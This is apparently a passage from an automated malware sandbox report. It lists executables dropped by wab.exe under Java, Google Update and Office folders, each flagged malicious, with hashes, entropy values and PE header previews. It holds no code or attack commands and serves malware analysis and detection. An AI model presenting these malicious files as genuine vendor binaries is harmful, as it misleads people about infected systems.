                                                                              Entropy (8bit):6.630224066462407
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                              MD5:4839E0285791329EE319914A14C4C058
                                                                              SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                              SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                              SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.632805023719349
                                                                              Encrypted:false
                                                                              SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                              MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                              SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                              SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                              SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):437888
                                                                              Entropy (8bit):6.304281817676703
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                              MD5:9547D26AD745DF9D0CCE708C32590984
                                                                              SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                              SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                              SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):343328
                                                                              Entropy (8bit):6.499135917181153
                                                                              Encrypted:false
                                                                              SSDEEP:6144:okTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:oklinJruphfg26p2Ewix+m8Nln3
                                                                              MD5:B0A00074F3B1720E1C604BE0552617EA
                                                                              SHA1:DB37A895170BBDA9CC760751028C7C0735392DA3
                                                                              SHA-256:284DBBCA777F4345B9863AC13E44E9430D699214EFB86A86940CE5DD0340587D
                                                                              SHA-512:FC3A9014266BBDA5AB0AA1A00FEF9096A42B61B8D512045D90B0C702EAFB4A02A5683D686FC962EDF7D88DC48D50E28C16CB1187AEC032D08EC543BD8A4AF1D9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):443680
                                                                              Entropy (8bit):6.273434344232977
                                                                              Encrypted:false
                                                                              SSDEEP:12288:V3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:Vx5k8hb0Haw+x5x
                                                                              MD5:8131AEDBC96AF343D27A37721104C7BA
                                                                              SHA1:169AC23A617F55EC5F1CD091B8C202FA8C145503
                                                                              SHA-256:FB7BFAF4B58771A348415FCC6E4122ABCA4082C3328A7CBFFEA57215A9C5E005
                                                                              SHA-512:3D8BAB13EFB2F919677EF26C1C1177BB0FD4C434325B60636C47B9C543061B41C6860912DD18CFF4133A4D27D2C608216682BE25B7B4B79C5DCB03D7A67D5378
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):203552
                                                                              Entropy (8bit):5.824786358578104
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkCaKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31OK8sws:5aK2h9H/B+rEtiPC
                                                                              MD5:9ABF58ADF874CBD3B1C98C5A8C00952C
                                                                              SHA1:384560927BED37C8EA188EA513564D6A5D963BC9
                                                                              SHA-256:7D83AF575B7894583D69E20CDD399EB544D332C954FCB12AEB43A5A6F1DAC047
                                                                              SHA-512:0A6BC7A997199CB5C9143CF3F43BE8B81E40B58D6AF9DEE68E9919B81253837BC2FD6E68FFB1CDA24AF7BB2F16BE6125842461F2B11E702A74B150A1D236F90A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):149792
                                                                              Entropy (8bit):6.130839286683668
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk34vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:kpsB+09zMH7cCxPd
                                                                              MD5:DDB50C235FC41D325CA396E4DADB7D03
                                                                              SHA1:78447DA5E4E2A5B956AAF7EB1D78381BD18B276A
                                                                              SHA-256:788B5CA09B6419BF4676C910284222425739E975D3933C7A797A6F7374B1CF4D
                                                                              SHA-512:BE2091EFC648E42A85E7849A10016AC5F207972C856BF38585E214F6C3A24226D976AA75C93CA6EDD3EFB03A28D65F1FF1B21F8EA2685FA2DB8FC4855CE5D25C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):227104
                                                                              Entropy (8bit):5.96400865851122
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkmWt9h8QlLISqG+T1Dpd9qEKLmoY46WeJ2B+O3dnDiani3F8I1rXRA/:9Wt9h8QlLISZWVRohcq7dvni3F8QrBA/
                                                                              MD5:0E040A535A5DAEE44210398E9D623F8A
                                                                              SHA1:68EAF347AF330274DCCC0163AF3B7BED78FA5130
                                                                              SHA-256:B1C1D4C7B6831A94636669F6FEEA80A8E74BDCA5AFCF9353E8530F48A903E3A9
                                                                              SHA-512:867BCC2EE42376C1EFE28A1CDDF55F4363BF058308D0D1DCDF741F6BF48E7201912B9666D30C9E8D75FFEA836BF17E1B4241CE913506FBA3EE48B08523B7D886
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264480
                                                                              Entropy (8bit):6.442315114933131
                                                                              Encrypted:false
                                                                              SSDEEP:6144:7wCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:7w6JmRI6Bitwpx+iQafFykG1da6edo
                                                                              MD5:3396F7DBBB1ED342742ACAD901459B6B
                                                                              SHA1:43BF682467DC7EE333A6FF5DFF7E44C26A522C31
                                                                              SHA-256:748DB965A420E06E4439E26B26729B52CB38A8EC1170912EFFE56EB4331EBACE
                                                                              SHA-512:C04F847FFF847251C182647680041DCC9CF4706A2C4C0EA0F2294A1085880BD01D2154D06C714310D8D604402B6B316428BF9A6A9193DB3E8CDC7CCFA48865AB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):149792
                                                                              Entropy (8bit):6.131209533569252
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkr4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:IksB+0YlEXAe6QPt
                                                                              MD5:0F315CC3D7FC51F663E1A006F0BFDBDB
                                                                              SHA1:59A12C582E0D917D4973FF3A79604869101CB322
                                                                              SHA-256:2948901E015CA1C99F320EF6FA7EB3AE4C21019DBFAD3512D6C88BACF2179229
                                                                              SHA-512:320E0A4E1F548B1DAA5D3675D8910ED135D0142BCD6A661C8E0D123A0368DF870B6110EE2DED79354C96F3EC23038C4F9E2DA2C9B5E3B483D0F6B0B40F7C5574
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.630224066462407
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                              MD5:4839E0285791329EE319914A14C4C058
                                                                              SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                              SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                              SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):135808
                                                                              Entropy (8bit):5.942801479985879
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoQrmKWGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nBs8m:/rkpqsyutjZqMNbSgxbFrj8m
                                                                              MD5:1F06DC6B1D2291AE551234B3109FA2FE
                                                                              SHA1:0BEA3FB19461017340CA691040D8E3A36F5FE4EF
                                                                              SHA-256:D7FBD9840C2638B6C3B02BED388863AC27D3DFCB09E50F056868E5CC85F8EE0B
                                                                              SHA-512:579F76483C73D69ABCAD7CA4B36D2E920A7B81897F95C17E782EAA791783855A37C271CD9A236ED366BE67618D4B443D2D941F69DEC037A101FAB47443418FF0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.632805023719349
                                                                              Encrypted:false
                                                                              SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                              MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                              SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                              SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                              SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):437888
                                                                              Entropy (8bit):6.304281817676703
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                              MD5:9547D26AD745DF9D0CCE708C32590984
                                                                              SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                              SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                              SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):163456
                                                                              Entropy (8bit):5.9115526693507805
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk6446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:r446d7T/H4X
                                                                              MD5:D1AF6B8FE233EC36D374D8A19B6CF350
                                                                              SHA1:54763AEFB38E704722815851C81CCF785A157345
                                                                              SHA-256:F93DA943A2FFB890D923439A90A7AD11C44D4385426E4AE7B50BA3CCAA271C0A
                                                                              SHA-512:41A1C1C56AFEA4805A857F5CD7D58C2DD15142003388A93378E63D5F5B5A9206AA78F43F084D1B57894D262F8A58507C33C202454E3D48D3DF7E82E63188FF04
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):127104
                                                                              Entropy (8bit):5.559603073488415
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoAs8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8nBsb:/rkkUkEsqzy7pxI8BszFJqkb
                                                                              MD5:A436A95C872F8E726BE28BD3F28FECA3
                                                                              SHA1:1B969154E933EE587DD09120290997AEAD912D07
                                                                              SHA-256:5E454A2DA6110838B52A0E2B6574C113898CBC987175F7DF2D25D91B9CBF3D39
                                                                              SHA-512:B7859034075CB8FCF718C85BA15864AD764BF615D38C592A584F1F03D1390317A43760EFEED1FCFF44677E90ABB943CA88891008B879277FC529AD24FC833F68
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):223360
                                                                              Entropy (8bit):5.817153710128924
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk6ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlZBnD:ZSyMZOy406qS2AroAxnw6f9JCXN1
                                                                              MD5:0E90F4C1D272BDFD6BF6FFAD932C914F
                                                                              SHA1:E3979345722CFF61E13670F831832BD0071028C1
                                                                              SHA-256:F3BC6D48071C74BC60549F00E279DB05B5C95549745422198E362CE8714C443B
                                                                              SHA-512:852E831A8647F12D88A50260A0F3AF938AE6C7F41D0FAE08B6C8D811B848F41A7317F42618759B3FBFABC004A84D8F3AE5DA9AE5AC4CF8C0F85FF02C03843E8C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):203264
                                                                              Entropy (8bit):6.382288995818921
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:WiFIf34hcUsz225/
                                                                              MD5:A758FF4E11CABD90381BF2DF8C94A835
                                                                              SHA1:3CF64CC942DABBA8D259C1BBBCAD8A8A5758FAFD
                                                                              SHA-256:6E96E7D72730FEC7AE5FBE319E54618D70944803BF81CF43381A7FBA3CF213F3
                                                                              SHA-512:BEF5CECFF18253A3273CA2826AF4B30A373195A8F1ED638A23A87A22BC0EEC0140A498888265B123236315E734C872B459041AA68577CFB264A3ACA3AC521E7D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):209912
                                                                              Entropy (8bit):6.052889138927242
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                              MD5:4D184C059578DB44A1F50ECA0F228274
                                                                              SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                              SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                              SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):209912
                                                                              Entropy (8bit):6.052889138927242
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                              MD5:4D184C059578DB44A1F50ECA0F228274
                                                                              SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                              SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                              SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264144
                                                                              Entropy (8bit):5.5958416454167645
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkaPEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:vPEC0QjWGNU6ITL1H0zvjkBA+7891
                                                                              MD5:44E9513BAB2A6092C7CD0F427E1FEDB4
                                                                              SHA1:42DD7A45E394541E5741CFA40209724E01F50D7D
                                                                              SHA-256:E613392D586721152E8B8F90369A483B43EB6E15756FD90327BA2825C0FCD919
                                                                              SHA-512:93D991C50A228F6F20FB8D1C54AD82DF6409742A8C5BFC4030158CAEDA575C818EF317AA694F08F35112C4D2289FF12DDBD937F954137D5F799AA2476F27DFA2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):430680
                                                                              Entropy (8bit):6.507043587745356
                                                                              Encrypted:false
                                                                              SSDEEP:6144:0mmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Jmt0LDdOUO42ZdocuI4kxBgGONqEL
                                                                              MD5:07C7EC19924DA741A70E2A34F6D38D1C
                                                                              SHA1:2FA274520A2DE8DF40E463DDB24B74E117250AC0
                                                                              SHA-256:5679106DE217223E2447D42372E4A17255BF639B15930856A8D15E25CE3E890A
